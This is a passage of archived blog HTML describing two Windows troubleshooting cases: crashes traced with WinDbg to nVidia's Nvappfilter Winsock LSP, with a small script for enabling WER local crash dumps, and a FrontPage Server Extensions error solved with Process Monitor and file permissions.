original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064673/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121026iF43EEC228C2F97A4" style="WIDTH: 550px; HEIGHT: 393px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Crashes in different programs seemed to point at a more fundamental problem. I had over-clocked the CPU, so I speculated that the rash of crashes were a side-effect of CPU overheating and reluctantly dialed back the clock multiplier to the factory specification. <SPAN style="mso-spacerun: yes"> </SPAN> To my dismay, however, the crashes continued. My next theory was that I had bad RAM, but the Windows Vista Memory Diagnostic failed to identify any problems. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Hardware problems seemingly cleared, my next move was to look at the process crash dumps to see if they held any clues. But first I had to find a crash dump to look at. 
Windows XP’s Application Error Reporting process always generates a dump before showing you the application crash dialog, and you can find the location of the dump by clicking to see the report details and then viewing the report’s technical information: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="231" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064674/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064674/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121027iFC78BC3E387B8408" style="WIDTH: 550px; HEIGHT: 231px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Windows Vista’s corresponding dialog doesn’t offer a way to get at a report’s technical information and it doesn’t generate a dump unless Microsoft’s Windows Error Reporting (WER) servers request it, which they only do for crashes reported in high volumes. Fortunately, WerFault, the process that presents the dialog, keeps the crashed process around until you press the Close Program button, which offers an opportunity to attach to the process with a debugger and examine it. 
You can see WerFault’s handle to a crashed Windows Media Player process in <A class="" href="#" mce_href="#" target="_blank"> Process Explorer </A> : </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="266" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064685/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064685/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121028iA7738E8249CF0A26" style="WIDTH: 357px; HEIGHT: 266px" width="357" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The next time I had a crash, I launched WinDbg, the Windows Debugger from the <A class="" href="#" mce_href="#" target="_blank"> Debugging Tools for Windows </A> package that’s available for free download from Microsoft. After making sure that I had the symbol configuration set to point at the Microsoft public symbol server (e.g. 
srv*c:\symbols*<A href="#" target="_blank">http://msdl.microsoft.com/download/symbols</A>) in the Symbol File Path dialog, I went to the File menu and selected the “Attach to a Process...” menu entry: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="202" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064676/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064676/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121029iFB7537F356E67C50" style="WIDTH: 318px; HEIGHT: 202px" width="318" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> That opens the WinDbg process selection dialog, which I scrolled through to find the crashed process. 
When I selected the process, WinDbg opened it and presented the same interface it does when it&nbsp;loads a crash dump, except that when you load a crash dump, you can execute the <I style="mso-bidi-font-style: normal"> !analyze </I> debugger command that uses heuristics to try and pinpoint the cause of the crash; when you perform a debugger attach, an analysis will just tell you what you already know, that you attached with a debugger: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="438" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064677/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064677/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121030i5516302C3F5ECAC6" style="WIDTH: 550px; HEIGHT: 438px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Looking for a potential cause of a crash when attached requires looking at the stack of each thread in the process, so I opened the Processes and Threads and Call Stack dialogs in the View menu: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <SPAN style="mso-spacerun: yes"> <IMG height="279" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064679/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064679/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121031i1B9ED7A674EB31A0" style="WIDTH: 354px; HEIGHT: 
279px" width="354" /> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> I started examining threads by selecting the first entry in the threads dialog: </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="107" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064680/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064680/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121032iDF79082DBD265504" style="WIDTH: 281px; HEIGHT: 107px" width="281" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The WinDbg command window usually grays and says “Busy” as WinDbg pulls symbols from the symbol server, after which the call stack dialog populates with the function nesting of the selected thread at the time of the crash. I examined each thread’s stack in turn, moving between threads by pressing the down arrow and then the enter key, hunting for a stack that had function names with the words “exception” or “fault” in them. 
Near the end of the list I came across this one: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="293" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064681/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064681/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121033iDC1A33DCA60689EE" style="WIDTH: 550px; HEIGHT: 293px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I noticed that the top of the list is full of functions with “Exception” in their names. Looking down the list (up the stack), I saw that a function in Nvappfilter called Kernel32.dll’s HeapFree function, leading to the crash. The exception in the heap’s free routines meant that either the caller passed a bogus heap address or that the heap was already corrupted when the function executed. If a Windows DLL had been the caller I would have suspected the latter, but in this case the caller was a third-party DLL, which I could tell by the fact that WinDbg couldn’t locate symbol information for it and hence didn’t know the names of the functions within it. 
I confirmed that by issuing the <I style="mso-bidi-font-style: normal"> lm </I> (list module) command to look at its version information: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="355" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064682/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064682/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121034i39584B226EEB6A6F" style="WIDTH: 550px; HEIGHT: 355px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Nvappfilter was now my primary suspect, but I didn’t have direct evidence that it was responsible. I continued to use the system and followed the same debugging steps on the next several crashes. Whether it was IE, WMP or a game, the faulting stack was always the same, with Nvappfilter calling HeapFree. That’s still not conclusive proof, but the anecdotal evidence was pretty compelling. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> At that point I went to see if there were updates for Nvappfilter, but I wasn’t sure what software package it was associated with. 
I entered its name in a Web search and discovered that it’s part of nVidia’s FirstPacket feature, which prioritizes game traffic and is included in the nForce motherboard’s software: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="373" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064683/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064683/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121035i65FB9CA06750F8BE" style="WIDTH: 550px; HEIGHT: 373px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I went to nVidia’s site and downloaded the most recent nForce driver package, but it failed to update Nvappfilter.dll and I continued to have the crashes. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The nVidia control panel offers no way that I could find to prevent Nvappfilter from loading, so my only recourse was to manually disable it. I wasn’t using the FirstPacket feature, which I had previously been unaware of, so I wouldn’t miss it, but first I had to figure out how it configured Windows to load it. 
For that I turned to <A class="" href="#" mce_href="#" target="_blank"> Autoruns </A> , where I found references to Nvappfilter’s 32-bit and 64-bit versions in the Winsock Layered Service Provider (LSP) section: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="248" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064684/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064684/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121036i1E0D8C58A09AE42D" style="WIDTH: 550px; HEIGHT: 248px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I deleted all of Nvappfilter’s entries, rebooted the system and have been crash-free since. While I was writing this post, I checked again for nForce software updates to see if Nvappfilter had been updated. The latest version doesn’t look like it includes Nvappfilter or any other Winsock LSP, so assuming Nvappfilter was at fault, it’s no longer an issue. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> One other thing I’ve done since I investigated these crashes is take advantage of Vista SP1’s <A class="" href="#" mce_href="#" target="_blank"> “local dumps” functionality </A> so that I'll&nbsp;automatically&nbsp;get a&nbsp;crash dump to investigate for any application crash I experience. If you create a key named HKLM\Software\Microsoft\Windows\Windows Error Reporting\LocalDumps, WerFault will always save a dump. Crashes go by default into %LOCALAPPDATA%\Crashdumps, but you can override that with a Registry value and also specify a limit on the number of crashes WerFault will keep. 
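</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> As a minimal sketch of that setup, the Python snippet below prints reg.exe commands that create the LocalDumps key and, optionally, set the location and retention values. The DumpFolder and DumpCount value names come from the Windows Error Reporting documentation; the helper name localdumps_commands, the C:\CrashDumps folder and the limit of 10 are illustrative assumptions rather than settings taken from this case. </FONT> </P> <BR />
<PRE>
```python
# Sketch: build the "reg add" commands that enable WER local dumps.
# The folder and count used in the example are assumptions chosen for
# illustration; nothing here touches the Registry by itself.

LOCALDUMPS_KEY = r"HKLM\Software\Microsoft\Windows\Windows Error Reporting\LocalDumps"


def localdumps_commands(dump_folder=None, dump_count=None):
    """Return reg.exe command lines that configure the LocalDumps key."""
    # Creating the key is the step the post describes as sufficient
    # for WerFault to start saving dumps.
    commands = ['reg add "{}" /f'.format(LOCALDUMPS_KEY)]
    if dump_folder is not None:
        # Overrides the default %LOCALAPPDATA%\Crashdumps location.
        commands.append(
            'reg add "{}" /v DumpFolder /t REG_EXPAND_SZ /d "{}" /f'.format(
                LOCALDUMPS_KEY, dump_folder))
    if dump_count is not None:
        # Limits how many dump files WerFault keeps.
        commands.append(
            'reg add "{}" /v DumpCount /t REG_DWORD /d {} /f'.format(
                LOCALDUMPS_KEY, int(dump_count)))
    return commands


if __name__ == "__main__":
    for line in localdumps_commands(r"C:\CrashDumps", 10):
        print(line)
```
</PRE>
<BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The printed commands need to be run from an elevated command prompt, because writing under HKLM requires administrative rights. 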
</FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:40:50 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-random-ie-and-wmp-crashes/ba-p/723654 MarkRussinovich 2019-06-27T06:40:50Z Guest Post: The Case of the FrontPage Error https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/guest-post-the-case-of-the-frontpage-error/ba-p/723637 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 13, 2008 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Welcome to the first guest "Case Of" blog post!&nbsp;I've received numerous great troubleshooting cases over the last two months and have selected this one, submitted by Troy Wolbrink,&nbsp;a corporate web master, as the first to share with you. </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Troy ran into a problem with his web server and instead of rebooting, reinstalling, or calling Microsoft Product Support Services (who would have <EM> undoubtedly </EM> suggested the same steps Troy followed on his own, but cost Troy an incident), he used basic troubleshooting techniques to solve it in a few minutes. 
</FONT> </SPAN> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> As with everyone else who has submitted a well-documented case with screenshots and log files, I sent Troy a signed copy of <A class="" href="#" mce_href="#" target="_blank"> Windows Internals </A> as thanks. </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> I'm including some of the cases I've received in my " <A class="" href="#" mce_href="#" target="_blank"> Case of the Unexplained... </A> " talk again at <A class="" href="#" mce_href="#" target="_blank"> TechEd/IT Pro </A> in June. In fact, even&nbsp;if you've watched the webcast from last November's TechEd/ITForum, be sure to come to the session, as it consists of entirely new cases. </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Before I present the case, I want to share a&nbsp;clever user-produced video that serves as both a tutorial and demonstration of <A class="" href="#" mce_href="#" target="_blank"> Zoomit </A> , a screen magnifier and annotation tool I developed as an aid for my presentations.&nbsp;You can find the video <A class="" href="#" mce_href="#" target="_blank"> here </A> . 
</FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Enjoy Troy's post and the Zoomit video and please keep submitting your troubleshooting cases! </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> -Mark </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-SIZE: 16pt; FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin; mso-bidi-font-size: 12.0pt"> The Case of the FrontPage Error </SPAN> <SPAN style="FONT-SIZE: 16pt; mso-bidi-font-size: 12.0pt"> </SPAN></P><P> </P> </SPAN> <P></P> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <I 
style="mso-bidi-font-style: normal"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> by Windows Detective Troy Wolbrink </FONT> </SPAN> </I> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <I style="mso-bidi-font-style: normal"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </I></P><P> </P> <P></P> </SPAN> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> I recently transitioned my website from shared hosting to my own dedicated server. <SPAN style="mso-spacerun: yes"> </SPAN> Parts of my website were using FrontPage Server Extensions (FPSE), such as&nbsp;the page which collected data and logged the results to a text file: </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> <IMG height="557" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054807/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054807/original.aspx" 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121021i83A1B4DD5D9DA3E5" style="WIDTH: 475px; HEIGHT: 557px" width="475" /> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> I installed FPSE using the Add/Remove Windows Components control panel applet, and then I did my best to configure them correctly with IIS. <SPAN style="mso-spacerun: yes"> </SPAN> But for some reason I could not get FPSE configured correctly such that my data collection form would work. <SPAN style="mso-spacerun: yes"> </SPAN> The error message from the browser was very vague: </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <IMG height="151" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054808/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054808/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121022iEF78229A49D972B1" style="WIDTH: 475px; HEIGHT: 151px" width="475" /> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> I looked for more information in the Event Log on the server, but it&nbsp;had nothing relevant. 
</FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <P> <FONT size="3"> </FONT> </P> </SPAN> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> My plan was to eventually replace this site with one built on ASP.NET and SQL Server, so I wasn’t feeling motivated to become an FPSE expert just to solve this one problem. <SPAN style="mso-spacerun: yes"> </SPAN> But because other priorities would keep this move to ASP.NET from happening for another year, I had no choice but to investigate. </FONT> </SPAN> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> I had just seen Mark’s talk on “ <A class="" href="#" mce_href="#" target="_blank"> The Case of the Unexplained... </A> ”, and I was inspired to run <A class="" href="#" mce_href="#" target="_blank"> Process Monitor </A> on my server to see if any clues to the problem might appear. <SPAN style="mso-spacerun: yes"> </SPAN> I excluded events from some obvious processes that had nothing to do with the problem. <SPAN style="mso-spacerun: yes"> </SPAN> This removed a lot of the noise. <SPAN style="mso-spacerun: yes"> </SPAN> Since my web page was “TntWebLog.htm” and it was writing to “TntWebLog.csv”, I configured Process Monitor to highlight anything with a Path containing “TntWebLog”. 
<SPAN style="mso-spacerun: yes"> </SPAN> </FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> To reproduce the problem, I pulled up my web browser and tried to submit the form. <SPAN style="mso-spacerun: yes"> </SPAN> Then back in Process Monitor I told it to stop capturing events. <SPAN style="mso-spacerun: yes"> </SPAN> I then scrolled down through the list looking for highlighted entries. <SPAN style="mso-spacerun: yes"> </SPAN> It was astonishing how quickly I found the problem. <SPAN style="mso-spacerun: yes"> </SPAN> FPSE was trying to create the file with the same name as the existing file: </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> <IMG height="198" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054809/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054809/original.aspx" 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121023i09E7D98FD24B612E" style="WIDTH: 550px; HEIGHT: 198px" width="550" /> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Obviously something was up with file permissions here. <SPAN style="mso-spacerun: yes"> </SPAN> I checked the file permissions for TntWebLog.csv and it didn’t have a listing for the IUSR_WEBBOARD account which is what is configured in IIS for anonymous access: </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> <IMG height="416" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054810/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054810/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121024i4F445A9D11631D23" style="WIDTH: 309px; HEIGHT: 416px" width="309" /> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> So I clicked Advanced, checked the box for “Allow inheritable permissions from the parent to propagate…” and clicked “OK”: </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: 
